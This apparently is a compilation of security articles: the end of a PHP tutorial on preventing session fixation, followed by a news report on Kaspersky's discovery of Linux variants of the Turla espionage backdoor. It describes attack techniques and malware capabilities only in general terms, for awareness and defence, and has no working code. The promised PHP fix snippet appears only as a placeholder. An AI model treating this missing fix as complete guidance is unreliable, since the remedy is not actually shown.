Session fixation is different from session hijacking: in session hijacking the attacker intercepts or hijacks the session's cookie, whereas in session fixation the attacker supplies the user with a session ID that is already set, and when that user logs in, the server assigns his data to the session ID set by the attacker, which grants the attacker access to the user's session. To prevent session fixation, one way is to check the referrer (we have mentioned that before). Another way is to reduce the duration for which sessions are active via another php.ini setting (session.cache_expire). However, what we recommend is that you regenerate session IDs frequently. Assigning a new session ID ensures that the ID a possible attacker has obtained is no longer useful, because a new session ID will have been assigned to the user. We can achieve that with the following snippet: Code3.php SNIPPET 10

Conclusion

In this article, we have examined some common exploits out there, and we hope that you will start implementing some of these security mechanisms in your future projects, if you are not doing so already.

Sources:

MDLog:/sysadmin, "Apache Tips: Disable the HTTP TRACE Method", accessed 3/12/2014. Available at: Apache Tips: Disable the HTTP TRACE method - MDLog:/sysadmin

OWASP, "Cross Site Tracing", accessed 4/12/2014. Available at: https://www.owasp.org/index.php/Cross_Site_Tracing

Stack Overflow, "What is PHP's session.referer_check protecting me from?", accessed 5/12/2014. Available at: security - What is PHP's session.referer_check protecting me from? - Stack Overflow

Source
25.

The Turla APT campaigns have a broader reach than initially anticipated after the recent discovery of two modules built to infect servers running Linux. Until now, every Turla sample in captivity was designed for either 32- or 64-bit Windows systems, but researchers at Kaspersky Lab have discovered otherwise.

"The attack tool takes us further into the set alongside the Snake rootkit and components first associated with this actor a couple years ago," wrote Kurt Baumgartner and Costin Raiu, researchers with Kaspersky's Global Research and Analysis Team. "We suspect that this component was running for years at a victim site, but do not have concrete data to support that statement just yet."

Like its Windows brethren, this version of Turla is a backdoor used to open communication to a command and control server—Kaspersky said it has sink-holed one such domain used by one of the Linux modules, whose communication is based on UDP packets—for file exfiltration, remote management and remote code execution. Turla has been used in espionage campaigns against municipal governments, embassies, militaries and other industrial targets, primarily in the Middle East and Europe.

In August, another component of these stealthy attacks, called Epic Turla, was disclosed; Epic is a multistage attack in which victims are compromised via spearphishing emails and other social engineering scams, or watering hole attacks. The Epic Turla campaigns combined commodity exploits with zero-day attacks against Windows XP and Windows Server 2003 machines, as well as an Adobe Reader zero day; the Windows exploits were used to elevate an attacker's privileges on the underlying system. More than 100 websites were reported to be infected in Epic Turla attacks, including the website for City Hall in Pinor, Spain, an entrepreneurial site in Romania and the Palestinian Authority Ministry of Foreign Affairs. All of the sites were built using the TYPO3 content management system, indicating the attackers had access to a vulnerability on that platform. Once compromised, the websites loaded remote JavaScript that performs a number of tasks, including dropping exploits for flaws in Internet Explorer 6-8, recent Java or Flash bugs, or a phony Microsoft Security Essentials application signed with a legitimate certificate from Sysprint AG.

Kaspersky's Raiu and Baumgartner said most of the code in the Linux version of Turla comes from public sources. The backdoor, for example, is based on cd00r, Baumgartner and Raiu wrote. It includes an ELF executable that is statically linked against the GNU C library, an older version of OpenSSL, and libpcap, the tcpdump network capture library. The use of the cd00r backdoor enables the attack to go undetected, researchers said, because it does not require elevated privileges while running remote commands.

Turla was uncovered early this year, and researchers also found a connection to the Agent.btz worm, which infected U.S. military networks and led to a government mandate banning the use of USB drives. While Agent.btz and Turla share characteristics—Turla uses the same XOR key and log file names as Agent.btz, for example—no one has linked the authors. Kaspersky's Baumgartner and Raiu said that Linux variants were known to exist, but this is the first sample caught in the wild.

Source